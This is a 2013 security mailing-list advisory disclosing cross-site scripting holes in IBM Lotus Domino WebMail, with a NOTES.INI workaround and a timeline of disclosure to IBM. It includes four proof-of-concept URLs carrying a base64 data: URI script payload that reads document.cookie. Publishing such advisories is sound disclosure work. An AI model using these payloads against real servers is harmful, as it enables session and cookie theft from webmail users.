Hello list!

I want to warn you about multiple Cross-Site Scripting vulnerabilities in
IBM Lotus Domino.

Last year I've announced multiple vulnerabilities in IBM software and after
IBM fixed many of them, I've disclosed them. These are new vulnerabilities
in Domino, which I've found at 03.05.2012 together with other holes.

In August 2012 I've wrote about vulnerabilities in IBM Lotus Domino, which
were related to Domino WebMail. I'll add new vulnerabilities in WebMail to
previous two holes. Which had CVE-2012-3302 and described in IBM Security
Bulletin: Aug-2012 IBM Lotus Domino Web Server Cross-Site Scripting
Vulnerabilities (http://www-01.ibm.com/support/docview.wss?uid=swg21608160).
IBM haven't created new CVE and new advisory for these vulnerabilities (at
least they didn't tell me and I didn't find it at their site).

-------------------------
Affected products:
-------------------------

Vulnerable are IBM Lotus Domino 8.5.4 and previous versions. These
vulnerabilities have been fixed in Domino 9.0. Which was recently released.
So every user of Domino can upgrade to latest 9.0 version or to use
workaround for previous versions (provided bellow).

----------
Details:
----------

Cross-Site Scripting (WASC-08):

The attack is possible via data: and vbscript: URI.

http://site/mail/x.nsf/CalendarFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://site/mail/x.nsf/WebInteriorCalendarFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://site/mail/x.nsf/ToDoFS?OpenFrameSet?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://site/mail/x.nsf/WebInteriorToDoFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

------------------
Workaround:
------------------

There is a workaround for these XSS vulnerabilities:

To avoid this attack, administrators can set the following variable on the
Domino server NOTES.INI, available in release 7.0 and later:

DominoValidateFramesetSRC=1

This method can be used for versions prior to Domino 9 (where these XSS
holes were fixed).

------------
Timeline:
------------ 

Full timeline read in the first advisory
(http://securityvulns.ru/docs28474.html).

- During 16.05-20.05.2012 I've wrote announcements about multiple
vulnerabilities in IBM software at my site.
- During 16.05-20.05.2012 I've wrote five advisories via contact form at IBM
site.
- At 31.05.2012 I've resend five advisories to IBM PSIRT, which they
received and said they would send them to the developers (of Lotus
products).
- At 15.08.2012 IBM released their advisory (above-mentioned) - just few
from total amount of holes.
- At 12.12.2012 after IBM fixed part of the holes, which I sent them in May,
I sent them new vulnerabilities in Lotus Domino.
- At 15.12.2012 remind IBM about last holes. No answer.
- At 02.03.2013 again remind IBM about last holes - since more then 2,5
months there was no answer from them.
- At 08.03.2013 IBM answered, holes will be fixed in Domino 9.0.
- At 25.03.2013 I've disclosed these vulnerabilities at my site
(http://websecurity.com.ua/6390/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua